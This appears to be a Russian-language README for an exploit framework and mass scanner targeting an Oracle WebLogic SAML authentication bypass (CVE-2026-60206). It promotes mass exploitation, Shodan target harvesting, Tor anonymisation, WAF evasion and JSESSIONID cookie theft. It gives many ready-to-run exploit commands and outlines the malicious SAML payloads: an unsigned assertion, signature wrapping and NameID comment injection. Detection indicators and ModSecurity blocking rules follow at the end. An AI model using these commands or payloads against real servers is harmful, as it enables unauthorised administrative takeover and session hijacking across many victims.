
👾 CVE-2026-60206 — Oracle WebLogic SAML Auth Bypass Exploit Framework ⚡Версии для Bash и Python. Возможности: --detect безопасная проверка, --exploit combo/unsigned/xsw/nameid/all, интеграция с --shodan, поддержка --tor, массовое сканирование, вывод в JSON/CSV/JSONL, проверка cookie. 🛡️ CVSS 9.9 Критический — Используйте этично, оставайтесь в рамках закона. 🔒

Эксплойт-фреймворк и массовый сканер
Только для авторизованного тестирования безопасности.
Этот инструмент предоставляется исключительно в образовательных целях и для авторизованного тестирования на проникновение.
Авторы и участники не несут ответственности за любое неправомерное использование или ущерб, причинённый данным программным обеспечением. Пользователи несут единоличную ответственность за получение явного письменного разрешения от владельца цели перед тестированием. Несанкционированный доступ к компьютерным системам незаконен в соответствии с Computer Fraud and Abuse Act (CFAA) и аналогичными законами по всему миру.
Используя данное программное обеспечение, вы соглашаетесь со следующим:
⚠️ ВНИМАНИЕ: Эта уязвимость активно эксплуатируется в реальных атаках. Несанкционированное использование может привести к серьёзным правовым последствиям.
CVE-2026-60206 — это критическая уязвимость неаутентифицированного обхода аутентификации в реализации SAML (Security Assertion Markup Language) в Oracle WebLogic Server. Она позволяет удалённым злоумышленникам обойти SAML-аутентификацию и получить административный доступ к консоли WebLogic без действительных учётных данных.
SAML-инъекция: уязвимость возникает из-за некорректной проверки SAML-утверждений. Злоумышленники могут создавать вредоносные SAML-ответы, обходящие проверки аутентификации.
Обход подписи: уязвимость позволяет обойти проверку XML-подписи с помощью атак XML Signature Wrapping (XSW), когда злоумышленники оборачивают вредоносные утверждения легитимными подписями.
Манипуляция NameID: злоумышленники могут внедрять комментарии или изменять поле NameID, чтобы выдать себя за привилегированных пользователей.
Административный доступ: успешная эксплуатация предоставляет злоумышленнику административный доступ к консоли WebLogic Server с полным контролем.
| Атрибут | Значение |
|---|---|
| 📅 Обнаружена | Июль 2026 (Oracle CPU) |
| ⚠️ Оценка CVSS | 9.9 (КРИТИЧЕСКАЯ) |
| 📋 CISA KEV | Добавлена 21 июля 2026 г. |
| 🎯 Затронутые продукты | Oracle WebLogic Server (Fusion Middleware) |
| 🔄 Исправлено в | Oracle CPU, июль 2026 |
| 🔓 Аутентификация | Не требуется (Pre-Auth) |
| 🌍 Активная эксплуатация | Подтверждена в реальных атаках (июль 2026) |
Полноценный учебный мультиэксплойт объединяет несколько векторов SAML-атак для обхода аутентификации и предоставляет расширенные возможности массового сканирования, перехвата cookie и административного доступа.
| Возможность | Описание |
|---|---|
| 🚀 Мультивекторный эксплойт | 7 векторов атаки: unsigned, xsw_v1-4, nameid, combo |
| 💻 Массовое сканирование | Параллельное сканирование с пулом потоков (Python) / FIFO (Bash) |
| 🔐 Кража cookie | Похищает JSESSIONID для перехвата сессии |
| 👑 Доступ к консоли администратора | Полный административный доступ к консоли WebLogic |
| 📁 Определение версии | Определяет версии WebLogic и статус уязвимости |
| 🌐 Пакетное сканирование | Массовая эксплуатация нескольких целей с многопоточностью |
| 🎯 Безопасное обнаружение | Опциональный флаг --detect для неинтрузивной проверки уязвимости |
| 🧩 Интеграция с Shodan | Загрузка целей прямо из поиска Shodan |
| 🔍 Поддержка Tor | Анонимизация сканирования через прокси Tor |
| 📊 Несколько форматов вывода | Потоковый вывод в JSON, CSV, JSONL |
| 🪟 Кроссплатформенность | Поддержка Linux, macOS, BSD, Alpine, WSL |
| 🔒 Потокобезопасность | Использует механизмы блокировки для параллельных операций |
| 📋 Автосохранение сессий | Сохраняет полученные cookie для последующего использования |
| ⚙️ Обход WAF | Ротация User-Agent и случайные задержки |
| Вектор | Описание |
|---|---|
unsigned | Неаутентифицированное SAML-утверждение без подписи |
xsw_v1 | XML Signature Wrapping — несколько утверждений |
xsw_v2 | XSW — обход конвертной подписи |
xsw_v3 | XSW — манипуляция пространствами имён |
xsw_v4 | XSW — инъекция нескольких утверждений |
nameid | Инъекция комментариев в NameID |
combo | Комбинированная атака (unsigned + XSW + NameID) |
--detect)Безопасный верификатор выполняет неинтрузивное обнаружение уязвимости без выполнения вредоносных нагрузок и внесения изменений в систему.
| Возможность | Описание |
|---|---|
| 🔍 Обнаружение WebLogic | Определяет экземпляры WebLogic через LoginForm.jsp |
| 📊 Определение версии | Определяет конкретные версии WebLogic и уровни исправлений |
| 🧪 Обнаружение SAML-эндпоинтов | Проверяет наличие SAML ACS-эндпоинтов |
| 🔒 Неинтрузивность | Только определяет уязвимые версии |
| 📋 Вывод в JSON/CSV | Экспорт результатов для отчётов |
| 🔄 Массовое сканирование | Сканирование нескольких целей с поддержкой потоков |
curl (для Bash-версии)pip (для библиотеки requests, Python-версия)# Python version
pip install requests urllib3
# Optional: Shodan support
pip install shodan
# Bash version: curl only (no additional dependencies)
[!NOTE] Bash-версия работает только с
curlи не имеет внешних зависимостей. Python-версия требуетrequestsиurllib3(опционально:shodanдля интеграции с Shodan).
exploit.py)# Single target exploit (combo mode)
python exploit.py -u https://192.168.1.100:7002 --exploit --user admin
# Exploit with all attack vectors
python exploit.py -u https://192.168.1.100:7002 --mode all --exploit -v
# Mass scanning from file (50 threads)
python exploit.py -l targets.txt --exploit -t 50 -o results.json
# Safe detection only (non-intrusive)
python exploit.py -l targets.txt --detect -o scan_results.csv
# Shodan integration
export SHODAN_API_KEY="your_api_key"
python exploit.py --shodan --shodan-query "WebLogic Server port:7002" --exploit
# Tor anonymized scanning
python exploit.py -l targets.txt --exploit --tor -t 20
# Proxy support
python exploit.py -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080
# Streaming JSONL output (memory efficient for large scans)
python exploit.py -l targets.txt --exploit -o results.jsonl
# Quiet mode (minimal output)
python exploit.py -l targets.txt --exploit -q -o results.json
# Custom timeout and retry
python exploit.py -u https://192.168.1.100:7002 --exploit --timeout 20 --retry 5 --delay 2.0
# SSL verification bypass
python exploit.py -u https://192.168.1.100:7002 --exploit --no-verify
# Verbose debugging
python exploit.py -u https://192.168.1.100:7002 --exploit -v
# Single target exploit
./exploit.sh -u https://192.168.1.100:7002 --exploit --user admin
# Mass scanning
./exploit.sh -l targets.txt --mode all --exploit -o results.json
# Tor anonymized scanning
./exploit.sh -l targets.txt --exploit --tor -t 20
# Shodan integration
export SHODAN_API_KEY="your_api_key"
./exploit.sh --shodan --exploit -o shodan_results.json
# Streaming JSONL output
./exploit.sh -l targets.txt --exploit -o results.jsonl
# Proxy support
./exploit.sh -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080
# SSL verification bypass
./exploit.sh -u https://192.168.1.100:7002 --exploit --no-verify
# Quiet mode
./exploit.sh -l targets.txt --exploit -q -o results.json
# Verbose debugging
./exploit.sh -u https://192.168.1.100:7002 --exploit -v
# Single target validation
./verifier_poc.sh -u https://192.168.1.100:7002 --user admin
# Mass validation with report
./verifier_poc.sh -l targets.txt --user admin -o report.txt
# SSL verification bypass
./verifier_poc.sh -u https://192.168.1.100:7002 --no-verify
# Proxy support
./verifier_poc.sh -u https://192.168.1.100:7002 --proxy http://127.0.0.1:8080
| Версия Oracle WebLogic | Статус |
|---|---|
| 12.2.1.4.0 | 🔴 УЯЗВИМА |
| 14.1.1.0.0 | 🔴 УЯЗВИМА |
| 14.1.2.0.0 | 🔴 УЯЗВИМА |
| 15.1.1.0.0 | 🔴 УЯЗВИМА |
| Другие версии | Проверьте Oracle CPU за июль 2026 |
⚠️ Важно: Эта уязвимость затрагивает самостоятельно размещённые (self-hosted) развёртывания WebLogic Server. Немедленно примените Oracle CPU за июль 2026 года.
Уязвимость позволяет злоумышленникам обойти SAML-аутентификацию, создавая вредоносные SAML-ответы, которые некорректно проверяются реализацией SAML в WebLogic.
Уязвимый эндпоинт:
POST /saml2/sp/acs HTTP/1.1
Host: target:7002
Content-Type: application/x-www-form-urlencoded
SAMLResponse=<base64_encoded_malicious_assertion>&RelayState=/
Неподписанное утверждение
saml2:Assertion saml2:Subject <saml2:NameID Format="...">admin</saml2:NameID> </saml2:Subject>
</saml2:Assertion>
XML Signature Wrapping (XSW)
ds:Signature <ds:Reference URI="#legit"> </ds:Reference> </ds:Signature>
<saml2:Assertion ID="evil"> saml2:Subjectadmin</saml2:Subject> </saml2:Assertion>
Инъекция комментариев в NameID
<saml2:NameID Format="...">
</saml2:NameID>
Успешная эксплуатация даёт cookie JSESSIONID, предоставляющую административный доступ к консоли WebLogic.
Похищенная cookie может использоваться для доступа:
Проверьте журналы WebLogic на предмет:
access.log — запросы к /saml2/sp/acs, /saml2/acs с необычными SAML-параметрамиdomain.log — попытки обхода аутентификации с недействительными SAML-утверждениямиdiagnostic.log — ошибки разбора SAML или сбои проверки подписиSAMLResponse, содержащие:
<saml2:Assertion><saml2:NameID>javascript: или eval() в параметрахconfig.xml, jps-config.xml)autodeployweblogic.security# Block SAML requests with multiple assertions
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10001,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - Multiple SAML Assertions',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*<saml2:Assertion>.*"
# Block SAML requests with comments in NameID
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10002,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - NameID Comments',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:NameID.*<!--.*-->.*"
# Block unsigned SAML assertions
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10003,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - Unsigned Assertion',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*(?!<ds:Signature>).*"